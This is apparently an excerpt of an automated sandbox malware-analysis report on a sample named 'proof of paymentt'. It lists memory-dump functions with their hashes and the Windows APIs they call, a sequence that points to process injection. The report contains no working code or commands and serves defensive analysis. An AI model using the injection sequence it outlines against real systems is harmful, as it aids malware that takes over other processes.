Instruction Fuzzy Hash: 1A2105B1C003499FCB10DFAAC981AEEBBF5FF48710F50842AE519A7250C7789945DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D6D8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D767

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 203c13f109da220b90e9302dcb2032a3f8dc87237ac67d7453ce679937afd988
Instruction ID: e9d17141a9f038ebb9b09abbf65569d9f1b138620f184e5214e4005778464889
Opcode Fuzzy Hash: 203c13f109da220b90e9302dcb2032a3f8dc87237ac67d7453ce679937afd988
Instruction Fuzzy Hash: C42116B59002489FDB10CFAAD584AEEBFF5FF48310F14805AE958A3350C378A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 06E17231 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E172B6

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 61d892404189fdbd8d89a32849e8c5c2477a70c86c6e93fcb528624b96f8e39b
Instruction ID: a8d5e5ad73e5bc457daceac898e3fe7a6d94d815183a1e1a5ec5cd7ad31893a1
Opcode Fuzzy Hash: 61d892404189fdbd8d89a32849e8c5c2477a70c86c6e93fcb528624b96f8e39b
Instruction Fuzzy Hash: A62138B5D003098FDB50DFAAC4857EEBBF5EF88324F54842AE419A7240CB789945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E17238 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E172B6

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7e8f1c6ac2e20bfb98f864c2bc78950fb6568df500631ac31bbac8330d77f89b
Instruction ID: 24ff2d6414d6b6e96931bd432815e6f92353ff9609b8c2c49b5205fda71af794
Opcode Fuzzy Hash: 7e8f1c6ac2e20bfb98f864c2bc78950fb6568df500631ac31bbac8330d77f89b
Instruction Fuzzy Hash: 9B2118B1D003098FDB50DFAAC4857EEBBF5EF48314F548429D519A7241CB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E178F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E17978

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ce3bd6657eb0fd20174d6b15e670575a6231b86fc69931959a12af74dc0435c7
Instruction ID: 35236d5f39ee6a2cc8a33491e156b798d552894191b6d5656edeef18548ce81f
Opcode Fuzzy Hash: ce3bd6657eb0fd20174d6b15e670575a6231b86fc69931959a12af74dc0435c7
Instruction Fuzzy Hash: 452125B1C003499FCB10DFAAC881AEEFBF5FF48310F50842AE519A7250C7389945DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D6E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D767

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b7f04b352b99b400edb946369ce4cdebbb766c2d734c69a4f4579c9652a032d8
Instruction ID: 23b5c4f8cc5967478f60f68b84422409c462fb151b805566276315a15d69c5be
Opcode Fuzzy Hash: b7f04b352b99b400edb946369ce4cdebbb766c2d734c69a4f4579c9652a032d8
Instruction Fuzzy Hash: E421E2B59003089FDB10CFAAD984ADEBFF9FB48310F14841AE918A3350D378A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0B680 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D0B4E1,00000800,00000000,00000000), ref: 00D0B6F2

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 407810a6151a75f5745b4e1276bf06b130a1f5f5b3e47c739e347f56270f1772
Instruction ID: 9c1288fbbfbe068f6e197d3a8822034411705b7792a10bd4a1d640965e9f6e1d
Opcode Fuzzy Hash: 407810a6151a75f5745b4e1276bf06b130a1f5f5b3e47c739e347f56270f1772
Instruction Fuzzy Hash: 291114B6D042498FDB10CF9AD484AEEFBF5AB98310F14845AD419A7650C379A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0AC50 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D0B4E1,00000800,00000000,00000000), ref: 00D0B6F2

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5a7ea001271d9c8cc41dc35d76ba693375bf340af259afc05dc85831d54f1310
Instruction ID: 8b2211f8ffd5d955a4482c34f11ccd857643e648c9a1f5e097f6e670fb61d61c
Opcode Fuzzy Hash: 5a7ea001271d9c8cc41dc35d76ba693375bf340af259afc05dc85831d54f1310
Instruction Fuzzy Hash: 7B1114B6C043498FCB10DF9AD444BDEFBF4EB98320F54846AD519A7240C379A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06E17740 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E177B6

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: feab6549b13a6e84b6aa50b05fc278aab9e0fac41337b0826fcd9431b05b93be
Instruction ID: 40586e57e774c785cecff9cd98b1633c42a670b4d360792cd72fe9196b1c5c3d
Opcode Fuzzy Hash: feab6549b13a6e84b6aa50b05fc278aab9e0fac41337b0826fcd9431b05b93be
Instruction Fuzzy Hash: 601156759002499FCB10DFAAC845BEEBFF5FF88314F24841AE519A7250CB3A9540CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E17748 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E177B6

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8872390cbec18c09c426b3ba9189cd04241319bbb60b7b9750bbb49965029bdd
Instruction ID: 88001c4d013a21807eb106cda7d626efe4f3c62d3acdfda471d5e6ef32703a93
Opcode Fuzzy Hash: 8872390cbec18c09c426b3ba9189cd04241319bbb60b7b9750bbb49965029bdd
Instruction Fuzzy Hash: 1C1126758003499FCB10DFAAC845AEEBFF5EF88714F14841AE519A7250C779A540CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E17180 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06E171EA

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ac51e8fc6515cb8aff5a4d70d9745dbcdd451b4e9178f2f60587d45258a193e9
Instruction ID: 5bb26ede8192d734aa7a3c93d6316fbd7c3a83beac11e560dca1bf93bf26f986
Opcode Fuzzy Hash: ac51e8fc6515cb8aff5a4d70d9745dbcdd451b4e9178f2f60587d45258a193e9
Instruction Fuzzy Hash: EB1158B1D003088FDB20DFAAC8457EEFBF5EF88724F248459D419A7240CB79A945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06E17188 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06E171EA

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 13e9197ffa7d981eecbfbe35c4717400b00aef8c2414b4073739ae42d169173d
Instruction ID: 136a6ce683d8a740bbcb47f5c237a75e8e38fac3a0f736ffa62a9df55693c425
Opcode Fuzzy Hash: 13e9197ffa7d981eecbfbe35c4717400b00aef8c2414b4073739ae42d169173d
Instruction Fuzzy Hash: 1F113AB1D003488FDB20DFAAC8457EEFBF5EF88714F248419D519A7240CB79A545CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 06E1C1F0 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06E1C255

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3e61c0d15f1db5a3dfdbbe21e16feccfb1bc050ad748d2ea1668acdf07dfa0c4
Instruction ID: 361f4e63bd78164f32d277a6931274ea9261dd9c60cc1c955633a5dcea3f6015
Opcode Fuzzy Hash: 3e61c0d15f1db5a3dfdbbe21e16feccfb1bc050ad748d2ea1668acdf07dfa0c4
Instruction Fuzzy Hash: 7B1113B58003499FCB10DF8AC444BDEBBF8EB48710F20840AD958A7200C379A544CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0B400 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B466

Memory Dump Source

Source File: 00000000.00000002.2036632517.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_proof of paymentt.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2995385f2f91c4cc120909fe1297d49ade9efa492f1e49883995811d8faa4e69
Instruction ID: 6a487e48609b00f2a16ef092ebe4f89c7ae23c3f827e43b91f33500a8eddc4ed
Opcode Fuzzy Hash: 2995385f2f91c4cc120909fe1297d49ade9efa492f1e49883995811d8faa4e69
Instruction Fuzzy Hash: 59110FB6C003498FCB10DF9AD444BDEFBF4EB88324F14845AD419A7251C379A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E1A4B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06E1C255

Memory Dump Source

Source File: 00000000.00000002.2041593765.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e10000_proof of paymentt.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 139e856b10004734f9b6afe4d573e340668b5576ddd7d8d254308dc19bc78a4b
Instruction ID: 937df53cf1e2545277f9d9e5a51cd3c118aa6251576152371f44c85b0f14cba7
Opcode Fuzzy Hash: 139e856b10004734f9b6afe4d573e340668b5576ddd7d8d254308dc19bc78a4b
Instruction Fuzzy Hash: E51106B58007499FDB50DF9AD549BDEBBF8FB48710F208459E918A7200C379A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07A71810 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

8aq, xrefs: 07A719D2

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID: 8aq
API String ID: 0-538729646
Opcode ID: 4d1b08b1b285bc8bc00bbebd86f9c6401048062f41b0fdd54539f862a07a4ce6
Instruction ID: d1d3d55ae3ac211c9a47921609c4fb9693d6da59233e6d7ad1b6450f676ca64d
Opcode Fuzzy Hash: 4d1b08b1b285bc8bc00bbebd86f9c6401048062f41b0fdd54539f862a07a4ce6
Instruction Fuzzy Hash: 0751D5B4E1524DDFCB00CFA8D980AADBBF5FB8A354F105529E425E7354E7309A42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 07A71820 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

8aq, xrefs: 07A719D2

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID: 8aq
API String ID: 0-538729646
Opcode ID: ee1a53895afb6ef7c46cebfef84b3e3d75f05922f8811dab79ef51556ad216c5
Instruction ID: a9c7003baad754aee5942531d534d0cc7fdcdfb0a33cc6fdd258e859bd40aa4a
Opcode Fuzzy Hash: ee1a53895afb6ef7c46cebfef84b3e3d75f05922f8811dab79ef51556ad216c5
Instruction Fuzzy Hash: 6A51D4B4E1524DDFCB00CFA9D9809ADBBF5EB8A350F10552AE425E7350E7309942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07A7B5C4 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07A7C311

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 5af271e0fb0b2d3d545f34ba2f1f648d0c4c5b17a380b1abff3ea72a4ad08cc6
Instruction ID: 5975d8346878927aea70fd6ee767c1743d23ccbaccd09f360a2824b2ee345630
Opcode Fuzzy Hash: 5af271e0fb0b2d3d545f34ba2f1f648d0c4c5b17a380b1abff3ea72a4ad08cc6
Instruction Fuzzy Hash: 13518371B102058FCB14EFB998999AFBBFAEFC5320B158929E425D7351DF309D0587A0

Uniqueness

Uniqueness Score: -1.00%

Function 07A7C0D0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07A7C13B

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 9b10383abe15a49f99779da5f6a48fd8b5d00f2acd313ae0cb5b1ec5e63fb65a
Instruction ID: 75aacf5b8846001b818fc12238844fc41abea2f9185871d4d7118dceff1a733c
Opcode Fuzzy Hash: 9b10383abe15a49f99779da5f6a48fd8b5d00f2acd313ae0cb5b1ec5e63fb65a
Instruction Fuzzy Hash: A5115E71F0020A9FCB04EBB99D115EEB6F6AFC9724B504079C519E7244EF318E02CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07A717E0 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

', xrefs: 07A717F3

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: f30635d174ed1855cb1c80f974a31cce7f1381efe68322dca9db12599c09332a
Instruction ID: 1ba82823135b33a272d3589e920ac98818bb8cfdbaf5587ec06d837e7b57a24c
Opcode Fuzzy Hash: f30635d174ed1855cb1c80f974a31cce7f1381efe68322dca9db12599c09332a
Instruction Fuzzy Hash: 27D0A7F005F10CD6C300D764DD0AA6F76FC9782211F000844D419131918AB16E51DE93

Uniqueness

Uniqueness Score: -1.00%

Function 07A7E9F8 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89bfc97e8f99d938640e86ee3762bfad1c98e7e9d9b103033248c682b2eb9ddb
Instruction ID: 6a1852f2e72b5acb786b20a5f9cea441d40c8040188e64aad2fa193776f64534
Opcode Fuzzy Hash: 89bfc97e8f99d938640e86ee3762bfad1c98e7e9d9b103033248c682b2eb9ddb
Instruction Fuzzy Hash: F651C6B4E18219DFCB14DFA9C88099DBBF1FF89311F108569E826A7351D730A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07A7A8B0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f75d0a7d87c6a62fbb95d05282110dfe1ea563a6d9d5d7818b07b79da550bf0
Instruction ID: 69b496927ca3544b9c8234c0996478b620e3ffdf33eefbee6c5076e219d744c2
Opcode Fuzzy Hash: 3f75d0a7d87c6a62fbb95d05282110dfe1ea563a6d9d5d7818b07b79da550bf0
Instruction Fuzzy Hash: 2451D4B0E152089FCB05DFA8E985AAEBBB6FF89310F109025E505A7358CB749D45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07A7A698 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d29d067b091ca765266c1d5dd6558d06104e58d70da27b39c9ba9841fd41748
Instruction ID: 75c07064701b79ff1d1ea9511e1829109896bfa1c933957d26e451bb2def0ba5
Opcode Fuzzy Hash: 8d29d067b091ca765266c1d5dd6558d06104e58d70da27b39c9ba9841fd41748
Instruction Fuzzy Hash: 4A41F074E112189FCB00DFA8D884AEEBBB1FF88320F109565E814B7355DB35A994CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07A70552 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353b5f6893afb8982babce820f5abe611fda03d215a2bf8cc613a1f4896913a5
Instruction ID: e22f0e1b9b9105c68c1a362cc965f42ce900e5cf0599f59f5bbd05e7d778a2ea
Opcode Fuzzy Hash: 353b5f6893afb8982babce820f5abe611fda03d215a2bf8cc613a1f4896913a5
Instruction Fuzzy Hash: D051B6B4A00218CFDB54DF68C891BEEBBB1EF49314F2084A9E419A7355DB71AE81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07A716B1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9aca8e2fac5e6341ef547beb5cf646965e9d3c9e09d4f670b2d5357ceded8dd
Instruction ID: 89e43e8e1dc54712a34b22bd76fb031ed49fcd92079e860546350657cd672041
Opcode Fuzzy Hash: f9aca8e2fac5e6341ef547beb5cf646965e9d3c9e09d4f670b2d5357ceded8dd
Instruction Fuzzy Hash: D131E9B4E2420EDBCB04DFA9D9819EEBBF5EB8A200F109525E825E7300D7309E41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07A716C0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8b8d3f7be48ea9d3bb4812839e6520ed5dc7c51d6cd0860a6e9418f8c50660
Instruction ID: 47a30a3194c8044d0d6a9a286334d5e7cc098ba1c001417266340bd80cc8f8a3
Opcode Fuzzy Hash: 6e8b8d3f7be48ea9d3bb4812839e6520ed5dc7c51d6cd0860a6e9418f8c50660
Instruction Fuzzy Hash: 9531B7B8E1520EDFCB04DFA9D9819AEBBF5EB8A244F109565E825E7300E7309A41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07A7DB78 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db7754d2cb341519cffeb94142c70bcdd8dd023f404b02985a80cce3638389a
Instruction ID: 18364bbe4f78d9be487f436733a53871621a27a57eea595951e47f0230b090a8
Opcode Fuzzy Hash: 9db7754d2cb341519cffeb94142c70bcdd8dd023f404b02985a80cce3638389a
Instruction Fuzzy Hash: 053139B6A00208AFCB10DFA9D945ADEBFF5EF48310F10846AE919E7210D775A950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07A7A388 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4471baf98280bf6c0a093295201751c8d5bd5e06ca7a34b12d780bdb55867bdb
Instruction ID: 2bab48238d0721b6327103b87edef089e56d72fafdca66477ec662166bd91317
Opcode Fuzzy Hash: 4471baf98280bf6c0a093295201751c8d5bd5e06ca7a34b12d780bdb55867bdb
Instruction Fuzzy Hash: F8312BB4E002099FDF05DF98E881AEEBBB5FF88310F149525E914A7394DB719A41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07A71BB0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d3cbd8dd51fdf41f1562ffbdfd98e54374501b73cf60f31ca2531a7ae64d8f
Instruction ID: e481fe67a338c326d70db328ae96f30dd594a250723bab9024dd14786b01616d
Opcode Fuzzy Hash: a5d3cbd8dd51fdf41f1562ffbdfd98e54374501b73cf60f31ca2531a7ae64d8f
Instruction Fuzzy Hash: D121E9B4E1924DDFCB00CFE9D9419EEBBF5EB8A200F10546AE425B7301D7359941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07A7A0A0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6183db976909b6f4a79b2a25ee132016930b7a0712fd5ab166e8937ffac84c19
Instruction ID: d84e0e0c9244d2d8044c72c12199ceca3cb5c72fc56b944eb7925c23ebc55577
Opcode Fuzzy Hash: 6183db976909b6f4a79b2a25ee132016930b7a0712fd5ab166e8937ffac84c19
Instruction Fuzzy Hash: 5231A774A14508DFC704DF5AE689A9DBBF1FF88300B6280D5E4489B369DB31AE15DB41

Uniqueness

Uniqueness Score: -1.00%

Function 07A70421 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4350408d85c102919c3a19877c98f0517e7e5d0333201389e964ae3cd602ee
Instruction ID: 6924ce35dafe69a1de24ec2eb69ac7b209aaec64f17d840e8521af6c68fa03c8
Opcode Fuzzy Hash: 0f4350408d85c102919c3a19877c98f0517e7e5d0333201389e964ae3cd602ee
Instruction Fuzzy Hash: 812181B2D147548FD719CFAADC4169EBBF2EFC6300F09C0AAD4189B266CB345906CB11

Uniqueness

Uniqueness Score: -1.00%

Function 07A7B764 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2efe6cd76ae407285f67371c09af055c66fe10c6819916436b34599e1593d48f
Instruction ID: 2bb914069dd79b668f4e73eba4ea716b9850abb3e4eefc4d5b1c47c7498e4482
Opcode Fuzzy Hash: 2efe6cd76ae407285f67371c09af055c66fe10c6819916436b34599e1593d48f
Instruction Fuzzy Hash: 0831F4B0D11218DFDB20DF99C989B9EBFF9AB48320F648059E414BB240C7B55845CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07A71BC0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67563bcfcbe506b60f86865888bbbf5a2231486f5b540ab4982d28600c1e51a
Instruction ID: 5c384303190693cc6b127cb3a383181b5323161627c6da3e23088637f97cea90
Opcode Fuzzy Hash: c67563bcfcbe506b60f86865888bbbf5a2231486f5b540ab4982d28600c1e51a
Instruction Fuzzy Hash: F421D5B4E1521DDBCB00DFE9D9819EEBBF5EB8A200F10942AE425B3300D7309901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07A78C70 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042664135.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

